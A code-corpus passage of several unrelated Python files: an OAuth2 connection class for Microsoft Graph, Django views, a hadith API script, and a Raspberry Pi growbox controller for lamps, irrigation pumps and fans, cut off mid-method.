        :param str proxy_password: the proxy password
        :param int requests_delay: number of milliseconds to wait between api
         calls.
         The Api will respond with 429 Too many requests if more than
         17 requests are made per second. Defaults to 200 milliseconds
         just in case more than 1 connection is making requests
         across multiple processes.
        :param bool raise_http_errors: If True Http 4xx and 5xx status codes
         will raise as exceptions
        :param int request_retries: number of retries done when the server
         responds with 5xx error codes.
        :param str token_file_name: custom token file name to be used when
         storing the OAuth token credentials.
        :param BaseTokenBackend token_backend: the token backend used to get
         and store tokens
        :param str tenant_id: use this specific tenant id, defaults to common
        :param dict kwargs: any extra params passed to Connection
        :raises ValueError: if credentials is not tuple of
         (client_id, client_secret)
        """
        if not isinstance(credentials, tuple) or len(credentials) != 2 or (
                not credentials[0] and not credentials[1]):
            raise ValueError('Provide valid auth credentials')

        self.auth = credentials
        self.scopes = scopes
        self.store_token = True

        # TODO: remove "token_file_name" in a future release
        if token_file_name is not None:
            warnings.warn('"token_file_name" will be removed in future versions.'
                          ' Please use "token_backend" instead', DeprecationWarning)
        # Default to a file system backend (token_filename=None means the
        # backend's default file name).
        token_backend = token_backend or FileSystemTokenBackend(token_filename=token_file_name)
        if not isinstance(token_backend, BaseTokenBackend):
            raise ValueError('"token_backend" must be an instance of a subclass of BaseTokenBackend')
        self.token_backend = token_backend
        self.session = None  # requests Oauth2Session object

        self.proxy = {}
        self.set_proxy(proxy_server, proxy_port, proxy_username, proxy_password)

        self.requests_delay = requests_delay or 0
        self._previous_request_at = None  # store previous request time
        self.raise_http_errors = raise_http_errors
        self.request_retries = request_retries

        # Plain (non-oauth) session used by naive_request.
        self.naive_session = Session()  # requests Session object
        self.naive_session.proxies = self.proxy

        if self.request_retries:
            retry = Retry(total=self.request_retries, read=self.request_retries,
                          connect=self.request_retries,
                          backoff_factor=RETRIES_BACKOFF_FACTOR,
                          status_forcelist=RETRIES_STATUS_LIST)
            adapter = HTTPAdapter(max_retries=retry)
            self.naive_session.mount('http://', adapter)
            self.naive_session.mount('https://', adapter)

        self._oauth2_authorize_url = 'https://login.microsoftonline.com/' \
                                     '{}/oauth2/v2.0/authorize'.format(tenant_id)
        self._oauth2_token_url = 'https://login.microsoftonline.com/' \
                                 '{}/oauth2/v2.0/token'.format(tenant_id)

    def set_proxy(self, proxy_server, proxy_port, proxy_username,
                  proxy_password):
        """ Sets a proxy on the Session

        :param str proxy_server: the proxy server
        :param int proxy_port: the proxy port, defaults to 8080
        :param str proxy_username: the proxy username
        :param str proxy_password: the proxy password
        """
        if proxy_server and proxy_port:
            if proxy_username and proxy_password:
                self.proxy = {
                    "http": "http://{}:{}@{}:{}".format(proxy_username,
                                                        proxy_password,
                                                        proxy_server,
                                                        proxy_port),
                    "https": "https://{}:{}@{}:{}".format(proxy_username,
                                                          proxy_password,
                                                          proxy_server,
                                                          proxy_port),
                }
            else:
                self.proxy = {
                    "http": "http://{}:{}".format(proxy_server, proxy_port),
                    "https": "https://{}:{}".format(proxy_server, proxy_port),
                }

    def check_token_file(self):
        """ Checks if the token file exists at the given position

        :return: if file exists or not
        :rtype: bool
        """
        # TODO: remove this method in a future release
        warnings.warn('This method will be removed in future versions',
                      DeprecationWarning)
        # Not every backend exposes check_token, hence the hasattr guard.
        return self.token_backend.check_token() if hasattr(self.token_backend, 'check_token') else None

    def get_authorization_url(self, requested_scopes=None,
                              redirect_uri=OAUTH_REDIRECT_URL, **kwargs):
        """ Initializes the oauth authorization flow, getting the
        authorization url that the user must approve.

        :param list[str] requested_scopes: list of scopes to request access for
        :param str redirect_uri: redirect url configured in registered app
        :param kwargs: allow to pass unused params in conjunction with Connection
        :return: authorization url
        :rtype: str
        """
        client_id, client_secret = self.auth

        if requested_scopes:
            scopes = requested_scopes
        elif self.scopes is not None:
            scopes = self.scopes
        else:
            raise ValueError('Must provide at least one scope')

        self.session = oauth = OAuth2Session(client_id=client_id,
                                             redirect_uri=redirect_uri,
                                             scope=scopes)
        self.session.proxies = self.proxy
        if self.request_retries:
            retry = Retry(total=self.request_retries, read=self.request_retries,
                          connect=self.request_retries,
                          backoff_factor=RETRIES_BACKOFF_FACTOR,
                          status_forcelist=RETRIES_STATUS_LIST)
            adapter = HTTPAdapter(max_retries=retry)
            self.session.mount('http://', adapter)
            self.session.mount('https://', adapter)

        # TODO: access_type='offline' has no effect according to documentation
        # This is done through scope 'offline_access'.
        auth_url, state = oauth.authorization_url(
            url=self._oauth2_authorize_url, access_type='offline')

        return auth_url

    def request_token(self, authorization_url, store_token=True,
                      token_path=None, **kwargs):
        """ Authenticates for the specified url and gets the token, save the
        token for future based if requested

        :param str authorization_url: url given by the authorization flow
        :param bool store_token: whether or not to store the token,
         so you don't have to keep opening the auth link and
         authenticating every time
        :param Path token_path: full path to where the token should be saved to
        :param kwargs: allow to pass unused params in conjunction with Connection
        :return: Success/Failure
        :rtype: bool
        """
        if self.session is None:
            # Fixed typo in the error message ("Fist" -> "First").
            raise RuntimeError("First call 'get_authorization_url' to "
                               "generate a valid oauth object")

        # TODO: remove token_path in future versions
        if token_path is not None:
            warnings.warn('"token_path" param will be removed in future versions.'
                          ' Use a TokenBackend instead', DeprecationWarning)

        _, client_secret = self.auth

        # Allow token scope to not match requested scope.
        # (Other auth libraries allow this, but Requests-OAuthlib
        # raises exception on scope mismatch by default.)
        os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'
        os.environ['OAUTHLIB_IGNORE_SCOPE_CHANGE'] = '1'

        try:
            self.token_backend.token = Token(self.session.fetch_token(
                token_url=self._oauth2_token_url,
                authorization_response=authorization_url,
                include_client_id=True,
                client_secret=client_secret))
        except Exception as e:
            log.error('Unable to fetch auth token. Error: {}'.format(str(e)))
            return False

        if store_token:
            self.token_backend.save_token()
        return True

    def get_session(self, token_path=None):
        """ Create a requests Session object

        :param Path token_path: (Only oauth) full path to where the token
         should be load from
        :return: A ready to use requests session
        :rtype: OAuth2Session
        """
        # TODO: remove token_path in future versions
        # Only warn when the deprecated param is actually used; previously the
        # warning fired on every call, even without a token_path.
        if token_path is not None:
            warnings.warn('"token_path" param will be removed in future versions.'
                          ' Use a TokenBackend instead.', DeprecationWarning)

        # gets a fresh token from the store
        token = self.token_backend.get_token()

        if token:
            client_id, _ = self.auth
            session = OAuth2Session(client_id=client_id, token=token)
        else:
            raise RuntimeError(
                'No auth token found. Authentication Flow needed')

        session.proxies = self.proxy
        if self.request_retries:
            retry = Retry(total=self.request_retries, read=self.request_retries,
                          connect=self.request_retries,
                          backoff_factor=RETRIES_BACKOFF_FACTOR,
                          status_forcelist=RETRIES_STATUS_LIST)
            adapter = HTTPAdapter(max_retries=retry)
            session.mount('http://', adapter)
            session.mount('https://', adapter)

        return session

    def refresh_token(self):
        """
        Refresh the OAuth authorization token.
        This will be called automatically when the access token
        expires, however, you can manually call this method to
        request a new refresh token.

        :return bool: Success / Failure
        """
        if self.session is None:
            self.session = self.get_session()

        token = self.token_backend.token
        if token and token.is_long_lived:
            client_id, client_secret = self.auth
            token = Token(self.session.refresh_token(
                self._oauth2_token_url,
                client_id=client_id,
                client_secret=client_secret))
        else:
            # Fixed typo ("refreh_token") and the missing space between the
            # two concatenated string parts of this log message.
            log.error('You can not refresh an access token that has no "refresh_token" available.'
                      ' Include "offline_access" scope when authentication to get a "refresh_token"')
            return False

        self.token_backend.token = token
        if self.store_token:
            self.token_backend.save_token()
        return True

    def _check_delay(self):
        """ Checks if a delay is needed between requests and sleeps if True """
        if self._previous_request_at:
            dif = round(time.time() - self._previous_request_at,
                        2) * 1000  # difference in miliseconds
            if dif < self.requests_delay:
                time.sleep(
                    (self.requests_delay - dif) / 1000)  # sleep needs seconds
        self._previous_request_at = time.time()

    def _internal_request(self, request_obj, url, method, **kwargs):
        """ Internal handling of requests. Handles Exceptions.

        :param request_obj: a requests session.
        :param str url: url to send request to
        :param str method: type of request (get/put/post/patch/delete)
        :param kwargs: extra params to send to the request api
        :return: Response of the request
        :rtype: requests.Response
        """
        method = method.lower()
        if method not in self._allowed_methods:
            raise ValueError('Method must be one of the allowed ones')

        if method == 'get':
            kwargs.setdefault('allow_redirects', True)
        elif method in ['post', 'put', 'patch']:
            if 'headers' not in kwargs:
                kwargs['headers'] = {}
            if kwargs.get('headers') is not None and kwargs['headers'].get(
                    'Content-type') is None:
                kwargs['headers']['Content-type'] = 'application/json'
            if 'data' in kwargs and kwargs['headers'].get(
                    'Content-type') == 'application/json':
                kwargs['data'] = json.dumps(
                    kwargs['data'])  # auto convert to json

        request_done = False
        token_refreshed = False

        # Loop so a single transparent token refresh can retry the request.
        while not request_done:
            self._check_delay()  # sleeps if needed
            try:
                log.info('Requesting ({}) URL: {}'.format(method.upper(), url))
                log.info('Request parameters: {}'.format(kwargs))
                # auto_retry will occur inside this function call if enabled
                response = request_obj.request(method, url,
                                               **kwargs)
                response.raise_for_status()  # raise 4XX and 5XX error codes.
                log.info('Received response ({}) from URL {}'.format(
                    response.status_code, response.url))
                request_done = True
                return response
            except TokenExpiredError as e:
                # Token has expired, try to refresh the token and try again on the next loop
                if not self.token_backend.token.is_long_lived:
                    raise e
                if token_refreshed:
                    # Refresh token done but still TokenExpiredError raise
                    raise RuntimeError('Token Refresh Operation not working')
                log.info('Oauth Token is expired, fetching a new token')
                self.refresh_token()
                log.info('New oauth token fetched')
                token_refreshed = True
            except (ConnectionError, ProxyError, SSLError, Timeout) as e:
                # We couldn't connect to the target url, raise error
                log.debug('Connection Error calling: {}.{}'
                          ''.format(url, ('Using proxy: {}'.format(self.proxy)
                                          if self.proxy else '')))
                raise e  # re-raise exception
            except HTTPError as e:
                # Server response with 4XX or 5XX error status codes
                # try to extract the error message:
                try:
                    error = response.json()
                    error_message = error.get('error', {}).get('message', '')
                except ValueError:
                    error_message = ''
                status_code = int(e.response.status_code / 100)
                if status_code == 4:
                    # Client Error
                    # Logged as error. Could be a library error or Api changes
                    log.error('Client Error: {} | Error Message: {}'.format(str(e), error_message))
                else:
                    # Server Error
                    log.debug('Server Error: {}'.format(str(e)))
                if self.raise_http_errors:
                    if error_message:
                        raise HTTPError('{} | Error Message: {}'.format(e.args[0], error_message), response=response) from None
                    else:
                        raise e
                else:
                    return e.response
            except RequestException as e:
                # catch any other exception raised by requests
                log.debug('Request Exception: {}'.format(str(e)))
                raise e

    def naive_request(self, url, method, **kwargs):
        """ Makes a request to url using a plain (non-oauth) session

        :param str url: url to send request to
        :param str method: type of request (get/put/post/patch/delete)
        :param kwargs: extra params to send to the request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self._internal_request(self.naive_session, url, method, **kwargs)

    def oauth_request(self, url, method, **kwargs):
        """ Makes a request to url using an oauth session

        :param str url: url to send request to
        :param str method: type of request (get/put/post/patch/delete)
        :param kwargs: extra params to send to the request api
        :return: Response of the request
        :rtype: requests.Response
        """
        # oauth authentication
        if self.session is None:
            self.session = self.get_session()

        return self._internal_request(self.session, url, method, **kwargs)

    def get(self, url, params=None, **kwargs):
        """ Shorthand for self.oauth_request(url, 'get')

        :param str url: url to send get oauth request to
        :param dict params: request parameter to get the service data
        :param kwargs: extra params to send to request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self.oauth_request(url, 'get', params=params, **kwargs)

    def post(self, url, data=None, **kwargs):
        """ Shorthand for self.oauth_request(url, 'post')

        :param str url: url to send post oauth request to
        :param dict data: post data to update the service
        :param kwargs: extra params to send to request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self.oauth_request(url, 'post', data=data, **kwargs)

    def put(self, url, data=None, **kwargs):
        """ Shorthand for self.oauth_request(url, 'put')

        :param str url: url to send put oauth request to
        :param dict data: put data to update the service
        :param kwargs: extra params to send to request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self.oauth_request(url, 'put', data=data, **kwargs)

    def patch(self, url, data=None, **kwargs):
        """ Shorthand for self.oauth_request(url, 'patch')

        :param str url: url to send patch oauth request to
        :param dict data: patch data to update the service
        :param kwargs: extra params to send to request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self.oauth_request(url, 'patch', data=data, **kwargs)

    def delete(self, url, **kwargs):
        """ Shorthand for self.request(url, 'delete')

        :param str url: url to send delete oauth request to
        :param kwargs: extra params to send to request api
        :return: Response of the request
        :rtype: requests.Response
        """
        return self.oauth_request(url, 'delete', **kwargs)

    def _save_token(self, token, token_path=None):
        """ Save the specified token dictionary to a specified file path

        :param dict token: token dictionary returned by the oauth token request,
         to be saved
        :param Path token_path: Path to the file with token information saved
        :return: Success/Failure
        :rtype: bool
        """
        # TODO: remove this method in future versions
        warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
        return False

    def _load_token(self, token_path=None):
        """ Load the specified token dictionary from specified file path

        :param Path token_path: Path to the file with token information saved
        :return: token data
        :rtype: dict
        """
        # TODO: remove this method in future versions
        warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
        return False

    def _delete_token(self, token_path=None):
        """ Delete the specified token dictionary from specified file path

        :param Path token_path: Path to the file with token information saved
        :return: Success/Failure
        :rtype: bool
        """
        # TODO: remove this method in future versions
        warnings.warn('This method is deprecated. Use a TokenBackend instead.', DeprecationWarning)
        return False

    def __del__(self):
        """
        Clear the session by closing it
        This should be called manually by the user "del account.con"
        There is no guarantee that this method will be called by the garbage collection
        But this is not an issue because these connections will be automatically closed.
        """
        if self.session:
            self.session.close()
def oauth_authentication_flow(client_id, client_secret, scopes=None,
                              protocol=None, **kwargs):
    """ A helper method to perform the OAuth2 authentication flow.
    Authenticate and get the oauth token

    :param str client_id: the client_id
    :param str client_secret: the client_secret
    :param list[str] scopes: a list of protocol user scopes to be converted
     by the protocol or raw scopes
    :param Protocol protocol: the protocol to be used.
     Defaults to MSGraphProtocol
    :param kwargs: other configuration to be passed to the Connection instance,
     connection.get_authorization_url or connection.request_token
    :return: Success or Failure
    :rtype: bool
    """
    credentials = (client_id, client_secret)

    protocol = protocol or MSGraphProtocol()

    con = Connection(credentials, scopes=protocol.get_scopes_for(scopes),
                     **kwargs)

    consent_url = con.get_authorization_url(**kwargs)

    print('Visit the following url to give consent:')
    print(consent_url)

    token_url = input('Paste the authenticated url here: ')

    if token_url:
        result = con.request_token(token_url, **kwargs)
        if result:
            print('Authentication Flow Completed. Oauth Access Token Stored. '
                  'You can now use the API.')
        else:
            # Fixed grammar in the user-facing failure message.
            print('Something went wrong. Please try again.')

        return bool(result)
    else:
        print('Authentication Flow aborted.')
        return False
| 42.259446 | 144 | 0.618406 |
36f8c6bf1b1f15eb867ce7f6cd5a26cec6eb5895 | 293 | py | Python | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | shows/Shows.py | stuporglue/hammond | dde0198afc269406e5b6e5057faa68866f765d06 | [
"MIT"
] | null | null | null | from shows.Adventure import Adventure
from shows.Clouds import Clouds
from shows.JurrasicPark import JurrasicPark
from shows.Roar import Roar
from shows.Roar2 import Roar2
from shows.Volcano import Volcano
from shows.Waves import Waves
from shows.Testing_The_Fences import Testing_The_Fences
| 32.555556 | 55 | 0.860068 |
095c2b3bd06ed4d23d6f2fa1eb6fd179771c1c10 | 761 | py | Python | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | 2 | 2018-08-27T00:47:18.000Z | 2020-12-11T01:23:59.000Z | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | null | null | null | interaction/views.py | hugocorra/bjorncrm | 1304b90c1f7d32942e1b4987c43a2ff9dede22dd | [
"MIT"
] | 1 | 2020-12-11T01:24:02.000Z | 2020-12-11T01:24:02.000Z | from django.shortcuts import render
from django.views.generic import ListView
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse_lazy
from contacts.models import Contato
from interaction.forms import InteracaoForm
from interaction.models import Interacao, InteracaoContatos
class InteracaoList(ListView):
    """Generic list view over all ``Interacao`` records.

    Relies entirely on Django's ``ListView`` defaults for template name
    (``interaction/interacao_list.html``) and context object name.
    """
    model = Interacao
class InteracaoCreate(CreateView):
    """Create view for ``Interacao`` objects backed by ``InteracaoForm``.

    On success the user is redirected to the interaction list page.
    """
    template_name = 'interaction/interaction_create_update.html'
    form_class = InteracaoForm
    success_url = reverse_lazy('interaction:interacao-list')
    # The previous get_context_data override only called super() and returned
    # the result unchanged, so it was removed; CreateView's implementation is
    # used directly with identical behavior.
| 30.44 | 73 | 0.78975 |
22006fcb2197796b2e95b6099fc90ed7fece7e0c | 817 | py | Python | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | main.py | SalSatSat/RandomHadith | 1077caa6ebb9be8a71c9c24ef9c89fe41cb4dced | [
"MIT"
] | null | null | null | import requests
import json
from Utils import printJSON
from Book import Book
def initBooks() -> list:
    """Fetch the list of hadith books from the ahadith API.

    :return: list of ``Book`` objects built from the API response
    :raises SystemExit: if the HTTP request fails or returns an error status
    """
    try:
        response = requests.get("https://ahadith-api.herokuapp.com/api/books/en")
        # Surface HTTP 4xx/5xx as RequestException instead of parsing an
        # error body as if it were book data.
        response.raise_for_status()
        # response.json() already yields a dict; the previous
        # json.dumps/json.loads round-trip was redundant.
        booksData = response.json()
        books = [Book(bookData['Book_ID'], bookData['Book_Name'])
                 for bookData in booksData['Books']]
    except requests.exceptions.RequestException as e:
        print(e)
        raise SystemExit(e)
    return books
# Script entry: fetch all books, then print one hadith as a smoke test.
books = initBooks()
# Chapter/hadith indices appear to be 1-based in this API -- TODO confirm.
ahadith = books[0].getChapter(1).getAhadith(1)
print(f"Hadith {ahadith.id}")
print(ahadith.sanad)
print(ahadith.text)
| 26.354839 | 81 | 0.642595 |
f23a9d64736feefd99073bc5f184386ba83b318a | 11,119 | py | Python | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null | N420_app/growbox.py | mattmatt91/N420 | 443d5e681800cb5bff468bb574407bbbbd6e221e | [
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
from time import sleep, time
from log_data import Logger,Preferences
from gpiozero import CPUTemperature
from sensors import Sensor
import json as js
import RPi.GPIO as GPIO
# Address pins by Broadcom SOC channel numbers (BCM), not board position.
GPIO.setmode(GPIO.BCM)
class Growbox():
    """Base class for every actuator in the growbox.

    Holds the shared hardware/services as class attributes (sensors,
    loggers, preferences) and keeps a registry of all actuator
    instances. Subclasses (Lamp, Pot, Fan) add their own control logic.
    """
    actuators = []
    # Presumably initializes the sensor hardware as a side effect; the
    # instance itself is intentionally discarded -- TODO confirm.
    Sensor()
    cpu = CPUTemperature()
    data_logger = Logger('data')
    error_logger = Logger('error_growbox')
    preferences_logger = Preferences()
    preferences = preferences_logger.get_data()
    log_interval = timedelta(minutes=preferences['log_interval'])
    # Backdate the last log so the first loop iteration logs immediately.
    last_log = datetime.now() - log_interval

    def __init__(self, pin, id):
        """Register an actuator on a GPIO pin (relay is active-low)."""
        self.pin = pin
        self.id = id
        self.state = False
        GPIO.setup(self.pin, GPIO.OUT)
        GPIO.output(self.pin, True)  # relay is inverted: True == off
        Growbox.actuators.append(self)

    def set_state(self, state=False):
        """Set the logical state and drive the (inverted) GPIO output."""
        self.state = state
        print(f'{self.id} set to state {self.state} and GPIO to {not self.state}')
        GPIO.output(self.pin, not self.state)

    def toggle_state(self):
        """Invert the actuator state and drive the GPIO accordingly.

        Bug fix: the original `self.state = not self.set_state` negated the
        *bound method* (always False) and never touched the GPIO pin.
        """
        self.set_state(not self.state)

    @classmethod
    def safe_preferences(cls):
        """Persist the current state/preferences snapshot via the preferences logger."""
        print(cls.preferences)
        cls.preferences_logger.write(cls.build_data())

    @classmethod
    def path_data(cls):
        """Return the path of the data log file."""
        return cls.data_logger.get_path()

    @staticmethod
    def get_time():
        """Return the current wall-clock time."""
        return datetime.now()

    @classmethod
    def update_sensordata(cls):
        """Refresh the shared sensor reading snapshot."""
        cls.sensordata = Sensor.get_data()

    # pins = [18, 23, 24, 17, 27, 22]
    @classmethod
    def init_actuators(cls):
        """Instantiate all actuators with their wiring and run one update pass."""
        print('init growbox')
        Growbox.update_sensordata()
        Lamp(24, 'lamp_g', 18, growth_phase='g')
        Lamp(23, 'lamp_f', 12, growth_phase='f')
        Pot(22, 'pot1', 27, 'soil1')
        Pot(17, 'pot2', 27, 'soil2')
        Fan(18, 'fan')
        cls.update_sensordata()
        Lamp.update_lamps()
        Pot.update_pots()
        Fan.update_fans()

    @classmethod
    def log_data(cls):
        """Append a JSON snapshot to the data log, at most once per log_interval."""
        if datetime.now() >= cls.last_log + cls.log_interval:
            print("logging data")
            cls.last_log = datetime.now()
            cls.data_logger.write(js.dumps(cls.build_data()))

    @classmethod
    def main_loop(cls):
        """Run the control loop: read sensors, update actuators, log."""
        print('starting growbox')
        while True:
            try:
                cls.update_sensordata()
                Lamp.update_lamps()
                Pot.update_pots()
                Fan.update_fans()
                cls.log_data()
            except Exception as e:
                # NOTE(review): the error is logged and then re-raised, so
                # any exception stops the loop -- confirm this is intended.
                cls.error_logger.write(repr(e))
                raise e

    @classmethod
    def build_data(cls):
        """Collect a flat dict of timestamps, sensor values and actuator states."""
        _data = {}
        _data['time'] = datetime.now().strftime("%H:%M:%S")
        _data['date'] = datetime.now().strftime("%m/%d/%Y %H:%M:%S")
        _data['cpu_temp'] = cls.cpu.temperature
        _data = _data | Growbox.sensordata
        _data = _data | Lamp.get_data()
        _data = _data | Pot.get_data()
        _data = _data | Fan.get_data()
        return _data
class Lamp(Growbox):
    """Grow lamp controller: on/off by daily schedule and growth phase.

    Class attributes hold the shared schedule; each instance is one lamp
    bound to a phase ('g' = growth, 'f' = flowering).
    """
    lamps = []
    phase = Growbox.preferences['lamp_phase']
    lamp_state = False
    # Daily switch-on time parsed from the "HH:MM" preference string.
    on_time = timedelta(hours=int(Growbox.preferences['lamp_ontime'].split(':')[0]),
                        minutes=int(Growbox.preferences['lamp_ontime'].split(':')[1]))

    def __init__(self, pin, id, duration, growth_phase='g'):
        """Create a lamp on *pin* that stays on *duration* hours in *growth_phase*."""
        super().__init__(pin, id)
        # The original assigned the raw int first and immediately overwrote
        # it with the timedelta; the dead assignment was removed.
        self.duration = timedelta(hours=duration)  # daily on-duration
        self.growth_phase = growth_phase
        Lamp.lamps.append(self)

    @classmethod
    def get_data(cls):
        """Return schedule and per-lamp state for logging."""
        _data = {}
        _data['lamp_phase'] = cls.phase
        _data['lamp_state'] = cls.lamp_state
        # Format the timedelta as zero-padded "HH:MM".
        _ontime = str(cls.on_time)
        if len(_ontime) < 8:
            _ontime = '0' + _ontime
        _ontime = _ontime[:_ontime.rfind(':')]
        _data['lamp_ontime'] = _ontime
        for lamp in cls.lamps:
            _data[lamp.id + '_state'] = lamp.state
            _data[lamp.id + '_duration'] = lamp.duration.seconds // 3600
            _data[lamp.id + '_phase'] = lamp.growth_phase
        return _data

    def update(self):
        """Switch the lamp according to the active phase and daily window."""
        _time = Growbox.get_time()
        day = datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)
        # turn off if not right phase
        if Lamp.phase != self.growth_phase and self.state:
            self.set_state(False)
        elif Lamp.phase == self.growth_phase:
            # turning off once outside the [on_time, on_time + duration) window
            if self.state:
                if _time > Lamp.on_time + self.duration + day or _time < Lamp.on_time + day:
                    self.set_state(False)
                    Lamp.lamp_state = False
            # turn on inside the window
            elif not self.state and _time > Lamp.on_time + day and _time < Lamp.on_time + day + self.duration:
                self.set_state(True)
                Lamp.lamp_state = True

    @classmethod
    def update_lamps(cls):
        """Run update() on every registered lamp."""
        for lamp in cls.lamps:
            lamp.update()

    @classmethod
    def set_phase(cls, phase):
        """Set the active growth phase: 'g' or 'f'.

        The original class defined this classmethod twice with identical
        bodies; the duplicate definition was removed.
        """
        cls.phase = phase

    @classmethod
    def set_starttime(cls, starttime):
        """Set the daily switch-on time from an "HH:MM" string."""
        _dt = datetime.strptime(starttime, "%H:%M")
        cls.on_time = timedelta(hours=_dt.hour, minutes=_dt.minute)
class Pot(Growbox):
    """Plant pot with a soil-moisture-driven valve, sharing a single pump.

    The pump state machine lives in class attributes because all pots
    share one pump; each instance controls only its own valve GPIO.
    """
    pin_pump = 0             # GPIO pin of the shared pump (set in __init__)
    state_pump = False       # True while the shared pump is running
    pots = []                # registry of all pot instances
    irrigation_interval = Growbox.preferences['irrigation_interval']  # minimum hours between waterings
    irrigation_duration = Growbox.preferences['irrigation_duration']  # pump run time in seconds
    soil_moist_hyst_min = Growbox.preferences['soil_moist_hyst_min']  # below this: mark dry
    soil_moist_hyst_max = Growbox.preferences['soil_moist_hyst_max']  # above this: mark wet

    def __init__(self, pin, state, pin_pump, index_soil):
        # NOTE(review): the second parameter is named "state" but is passed
        # to Growbox.__init__ as the actuator *id* -- consider renaming.
        super().__init__(pin, state)
        Pot.pin_pump = pin_pump
        Pot.pots.append(self)
        # key into Growbox.sensordata (available: "soil1", "soil2", "soil3")
        self.index_soil = index_soil
        self.flag_dry = False
        # Backdate last irrigation so the first watering is allowed ~15s
        # after startup instead of waiting a full interval.
        self.last_irrigation = datetime.now() - timedelta(hours=Pot.irrigation_interval) + timedelta(seconds=15)
        GPIO.setup(pin_pump, GPIO.OUT)
        GPIO.output(self.pin, True)  # valve relay is inverted: True == closed

    @classmethod
    def get_data(cls):
        """Return pump/irrigation settings and per-pot state for logging."""
        _data = {}
        _data['state_pump'] = cls.state_pump
        _data['irrigation_interval'] = cls.irrigation_interval
        _data['irrigation_duration'] = cls.irrigation_duration
        _data['soil_moist_hyst_min'] = cls.soil_moist_hyst_min
        _data['soil_moist_hyst_max'] = cls.soil_moist_hyst_max
        for pot in cls.pots:
            _data[pot.id + '_state'] = pot.state
            _data[pot.id + '_dry'] = pot.flag_dry
            _data[pot.id + '_soil_moist'] = pot.soil_moist
        return _data

    def update(self):
        """Refresh soil moisture and run the shared-pump irrigation state machine."""
        # update soil moisture reading
        self.soil_moist = Growbox.sensordata[self.index_soil]
        # hysteresis: raise the dry flag below min, clear it above max
        if self.soil_moist <= Pot.soil_moist_hyst_min:
            self.flag_dry = True
        elif self.soil_moist >= Pot.soil_moist_hyst_max:
            self.flag_dry = False
        # start pump + open valve only when the pump is idle, this pot is dry
        # and the minimum interval since its last watering has passed
        if not Pot.state_pump and self.flag_dry and datetime.now() - self.last_irrigation > timedelta(hours=Pot.irrigation_interval):
            Pot.start_time = datetime.now()
            Pot.state_pump = True
            GPIO.output(Pot.pin_pump, False)  # inverted relay: False == pump on
            Pot.pumping_pot_id = self.id      # remember which pot owns the pump
            self.last_irrigation = datetime.now()
            self.set_state(True)
        # stop after irrigation_duration, but only from the pot that started it
        elif Pot.state_pump and Pot.pumping_pot_id == self.id and datetime.now() - Pot.start_time > timedelta(seconds=self.irrigation_duration):
            Pot.state_pump = False
            GPIO.output(Pot.pin_pump, True)  # inverted relay: True == pump off
            self.set_state(False)
            Pot.pumping_pot_id = ''

    @classmethod
    def update_pots(cls):
        """Run update() on every registered pot."""
        for pot in cls.pots:
            pot.update()

    @classmethod
    def set_irrigation_interval(cls, irrigation_interval):  # in hours
        cls.irrigation_interval = int(irrigation_interval)

    @classmethod
    def set_irrigation_duration(cls, irrigation_duration):  # in seconds
        cls.irrigation_duration = int(irrigation_duration)

    @classmethod
    def set_soil_moist_hyst_min(cls, soil_moist_hyst_min):
        cls.soil_moist_hyst_min = int(soil_moist_hyst_min)

    @classmethod
    def set_soil_moist_hyst_max(cls, soil_moist_hyst_max):
        cls.soil_moist_hyst_max = int(soil_moist_hyst_max)
class Fan(Growbox):
    """Exhaust fan controller with temperature/humidity hysteresis.

    Fans turn on when temperature OR humidity exceed the max threshold
    and turn off only once BOTH fall below the min thresholds.
    """
    fans = []
    temp_hyst_min = Growbox.preferences['temp_hyst_min']
    temp_hyst_max = Growbox.preferences['temp_hyst_max']
    hum_hyst_min = Growbox.preferences['hum_hyst_min']
    hum_hyst_max = Growbox.preferences['hum_hyst_max']
    fans_state = False  # mirrors the state of the most recently updated fan

    def __init__(self, pin, id):
        super().__init__(pin, id)
        Fan.fans.append(self)

    @classmethod
    def get_data(cls):
        """Return hysteresis settings and per-fan state for logging."""
        _data = {}
        _data['temp_hyst_min'] = cls.temp_hyst_min
        _data['temp_hyst_max'] = cls.temp_hyst_max
        _data['hum_hyst_min'] = cls.hum_hyst_min
        _data['hum_hyst_max'] = cls.hum_hyst_max
        _data['state'] = cls.fans_state
        for fan in cls.fans:
            _data[fan.id + '_state'] = fan.state
        return _data

    def update(self):
        """Switch the fan based on the latest temperature/humidity readings."""
        temp = int(Growbox.sensordata['temp'])
        hum = int(Growbox.sensordata['hum'])
        if not self.state:
            # turn on when either value crosses its upper threshold
            if temp >= Fan.temp_hyst_max or hum >= Fan.hum_hyst_max:
                self.set_state(True)
                Fan.fans_state = True
        # turn off only once both values drop below their lower thresholds
        elif self.state and Fan.temp_hyst_min > temp and Fan.hum_hyst_min > hum:
            self.set_state(False)
            Fan.fans_state = False

    @classmethod
    def update_fans(cls):
        """Run update() on every registered fan."""
        for fan in cls.fans:
            fan.update()

    @classmethod
    def set_temp_hyst_min(cls, temp_hyst_min):
        cls.temp_hyst_min = int(temp_hyst_min)

    @classmethod
    def set_temp_hyst_max(cls, temp_hyst_max):
